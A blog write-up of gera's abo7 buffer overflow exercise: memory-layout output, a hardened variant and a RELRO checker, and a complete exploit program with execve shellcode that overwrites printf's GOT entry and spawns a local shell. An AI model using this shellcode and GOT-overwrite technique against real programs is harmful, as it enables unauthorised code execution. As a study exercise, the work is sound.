Wednesday, January 26, 2011

Advanced Buffer Overflow #7 Redux Redux

[dennis@localhost abo8-2]$ nm -n abo8

...

08049600 B buf
08049700 A _end

On this system, when buf is in the BSS, we can't overwrite anything useful.

Instead, I'm using this post as a note to myself about overwriting GOT entries in abo7. I've appended a printf() to abo7.c.
/* abo7.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* sometimes you can,       *
 * sometimes you don't      *
 * that's what life's about */

#include <stdio.h>   /* printf */
#include <string.h>  /* strcpy */

char buf[256]={1};   /* initialised, so it lands in .data rather than .bss */

int main(int argv,char **argc) {
        strcpy(buf,argc[1]);     /* unbounded copy into the 256-byte global */
        printf("printf me\n");   /* the appended call; its GOT entry is what gets overwritten */
}
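For contrast, here is a bounded version of the same program. This is an added example, not part of the original post or of gera's code; copy_arg and probe_len are names chosen for it. The point worth keeping in mind is that buf is a global in .data, so a stack canary never sees this overflow: either the copy is bounded, as below, or the overwrite target has to be made unwritable.

```c
#include <stdio.h>
#include <string.h>

#define BUFSZ 256

/* Same global as abo7.c. It lives in .data, not on the stack, so
 * -fstack-protector never sees an overflow of it. */
char buf[BUFSZ] = {1};

/* Hardened replacement for strcpy(buf, argc[1]): scan at most BUFSZ bytes of
 * src and refuse anything that does not fit together with its NUL.
 * Returns 0 on success, -1 when rejected (buf is left untouched). */
int copy_arg(const char *src)
{
    size_t n = 0;
    while (n < BUFSZ && src[n] != '\0')
        n++;
    if (n == BUFSZ)          /* 256 or more bytes: would run into whatever follows buf */
        return -1;
    memcpy(buf, src, n + 1); /* n + 1 <= BUFSZ, includes the terminator */
    return 0;
}

/* Helper for trying a given input length: builds a constructed string of
 * `len` 'A' bytes and feeds it to copy_arg. Returns copy_arg's result. */
int probe_len(size_t len)
{
    char s[512];
    if (len >= sizeof s)
        return -2;
    memset(s, 'A', len);
    s[len] = '\0';
    return copy_arg(s);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    if (copy_arg(argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUFSZ - 1);
        return 1;
    }
    printf("printf me\n");
    return 0;
}
```

Run with a 300-byte argument and it exits with status 1 before printf is ever reached; anything of 255 bytes or less is copied intact.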

[dennis@localhost abo7-3]$ nm -n abo7

...

08049560 D buf
08049660 ? __EH_FRAME_BEGIN__
08049660 ? __FRAME_END__
08049660 d force_to_data
08049664 ? __CTOR_LIST__
08049668 ? __CTOR_END__
0804966c ? __DTOR_LIST__
08049670 ? __DTOR_END__
08049674 ? _GLOBAL_OFFSET_TABLE_

...

[dennis@localhost abo7-3]$ objdump -R abo7 | grep printf
0804968c R_386_JUMP_SLOT   printf

(gdb) x/x buf
0x8049560 <buf>:        0x00000001

(gdb) x/x 0x08049674
0x8049674 <_global_offset_table_>:      0x0804969c
(gdb) print /d 0x8049674 - 0x8049560
$2 = 276

(gdb) x/x 0x0804968c
0x804968c <_global_offset_table_+24>:   0x08048366
(gdb) x/x 0x08048366
0x8048366 <printf+6>:   0x00001868
(gdb) print /d 0x0804968c - 0x8049560
$3 = 300

The GOT, at 0x8049674, is 276 bytes past the start of buf, and the printf entry, at 0x0804968c, is 300 bytes past it.
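The overwrite only works because the GOT is still writable when main() runs. Linking with -Wl,-z,relro,-z,now (full RELRO) has the loader resolve every import at startup and then mprotect the region holding the GOT read-only, so a write to 0x0804968c faults instead of redirecting printf; partial RELRO (-z relro alone) leaves the lazily bound .got.plt slots writable and does not help here. The check below is an added example, not from the post: it applies the same classification checksec uses (PT_GNU_RELRO present, plus BIND_NOW in the dynamic section) to a 32-bit ELF image in memory, and also reports whether a given GOT slot falls inside the protected range. The three images it builds are constructed stand-ins with made-up segment bounds, not abo7's actual headers; only the printf slot address comes from the objdump output above.

```c
#include <elf.h>
#include <stdio.h>
#include <string.h>

enum relro { RELRO_NONE = 0, RELRO_PARTIAL = 1, RELRO_FULL = 2 };

#define PRINTF_SLOT 0x0804968cu   /* printf's GOT entry, from objdump -R above */

/* Classify RELRO for a 32-bit ELF image in memory (the test checksec applies)
 * and report whether `slot` lies inside PT_GNU_RELRO, i.e. is remapped
 * read-only once the loader has finished relocating. Partial RELRO keeps the
 * lazily bound .got.plt slots writable; full RELRO (BIND_NOW) does not. */
enum relro classify_relro(const unsigned char *img, size_t len,
                          Elf32_Addr slot, int *slot_protected)
{
    const Elf32_Ehdr *eh = (const Elf32_Ehdr *)img;
    int have_relro = 0, bind_now = 0;

    *slot_protected = 0;
    if (len < sizeof *eh || memcmp(eh->e_ident, ELFMAG, SELFMAG) != 0 ||
        eh->e_ident[EI_CLASS] != ELFCLASS32 ||
        eh->e_phoff + (size_t)eh->e_phnum * sizeof(Elf32_Phdr) > len)
        return RELRO_NONE;

    const Elf32_Phdr *ph = (const Elf32_Phdr *)(img + eh->e_phoff);
    for (int i = 0; i < eh->e_phnum; i++) {
        if (ph[i].p_type == PT_GNU_RELRO) {
            have_relro = 1;
            if (slot >= ph[i].p_vaddr && slot < ph[i].p_vaddr + ph[i].p_memsz)
                *slot_protected = 1;
        } else if (ph[i].p_type == PT_DYNAMIC) {
            if (ph[i].p_offset + ph[i].p_filesz > len)
                return RELRO_NONE;
            const Elf32_Dyn *dyn = (const Elf32_Dyn *)(img + ph[i].p_offset);
            size_t n = ph[i].p_filesz / sizeof(Elf32_Dyn);
            for (size_t j = 0; j < n && dyn[j].d_tag != DT_NULL; j++)
                if (dyn[j].d_tag == DT_BIND_NOW ||
                    (dyn[j].d_tag == DT_FLAGS && (dyn[j].d_un.d_val & DF_BIND_NOW)) ||
                    (dyn[j].d_tag == DT_FLAGS_1 && (dyn[j].d_un.d_val & DF_1_NOW)))
                    bind_now = 1;
        }
    }
    if (!have_relro)
        return RELRO_NONE;
    return bind_now ? RELRO_FULL : RELRO_PARTIAL;
}

/* Constructed images (not abo7's real headers). mode 0: no RELRO.
 * mode 1: partial, region 0x8049660-0x8049688 stops short of printf's slot.
 * mode 2: full, region reaches 0x80496a0 and DT_FLAGS carries BIND_NOW.
 * Layout: Ehdr at 0, program headers at 64, dynamic entries at 128. */
static union { unsigned char bytes[256]; Elf32_Ehdr hdr; } g_img;

static size_t build_image(int mode)
{
    Elf32_Ehdr *eh = &g_img.hdr;
    Elf32_Phdr *ph = (Elf32_Phdr *)(g_img.bytes + 64);
    Elf32_Dyn *dyn = (Elf32_Dyn *)(g_img.bytes + 128);
    int n = 0;

    memset(g_img.bytes, 0, sizeof g_img.bytes);
    memcpy(eh->e_ident, ELFMAG, SELFMAG);
    eh->e_ident[EI_CLASS] = ELFCLASS32;
    eh->e_ident[EI_DATA] = ELFDATA2LSB;
    eh->e_phoff = 64;
    eh->e_phentsize = sizeof(Elf32_Phdr);

    ph[n].p_type = PT_DYNAMIC;
    ph[n].p_offset = 128;
    ph[n].p_filesz = 2 * sizeof(Elf32_Dyn);
    n++;
    if (mode == 2) {               /* zeroed memory already reads as DT_NULL */
        dyn[0].d_tag = DT_FLAGS;
        dyn[0].d_un.d_val = DF_BIND_NOW;
    }
    if (mode >= 1) {
        ph[n].p_type = PT_GNU_RELRO;
        ph[n].p_vaddr = 0x08049660;
        ph[n].p_memsz = (mode == 2) ? 0x40 : 0x28;
        ph[n].p_filesz = ph[n].p_memsz;
        n++;
    }
    eh->e_phnum = n;
    return 128 + 2 * sizeof(Elf32_Dyn);
}

int scenario_relro(int mode)
{
    int prot;
    return classify_relro(g_img.bytes, build_image(mode), PRINTF_SLOT, &prot);
}

int scenario_slot_protected(int mode)
{
    int prot;
    classify_relro(g_img.bytes, build_image(mode), PRINTF_SLOT, &prot);
    return prot;
}

int main(void)
{
    static const char *name[] = { "none", "partial", "full" };
    for (int mode = 0; mode < 3; mode++)
        printf("image %d: RELRO=%-7s printf slot 0x%08x is %s\n", mode,
               name[scenario_relro(mode)], PRINTF_SLOT,
               scenario_slot_protected(mode) ? "read-only" : "writable");
    return 0;
}
```

On a real binary the same two questions are answered by readelf -l (look for a GNU_RELRO program header) and readelf -d (look for BIND_NOW in FLAGS or NOW in FLAGS_1); the abo7 build above shows neither, which is why the write to the GOT sticks.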

Putting it together.
dennis@ipa:~/abo7-3$ cat exp.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* execve */

#define BUFLEN 304
#define VULN "./abo7"
/* hardcoded for simplicity, but need a better way to get this */
#define RET 0x8049560

char shellcode[] =
  /* aleph one shellcode */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main()
{
  char argv1[BUFLEN + 1];
  char *p;
  char *argv[] = { VULN, argv1, NULL };

  p = argv1;

  /* nops */
  memset(p, '\x90', 16);
  p += 16;

  /* shellcode */
  memcpy(p, shellcode, strlen(shellcode));
  p += strlen(shellcode);

  /* padding: fill up to 300 bytes, the offset of the printf GOT entry */
  memset(p, 'A', (BUFLEN - 16 - strlen(shellcode) - 4));
  p += (BUFLEN - 16 - strlen(shellcode) - 4);

  /* set printf got entry (4-byte pointer: this is a 32-bit build) */
  *((void **)p) = (void *)RET;
  p += 4;

  *p = '\0';

  execve(argv[0], argv, NULL);
  return -1;
}

[dennis@localhost abo7-3]$ ./exp
sh-2.04$
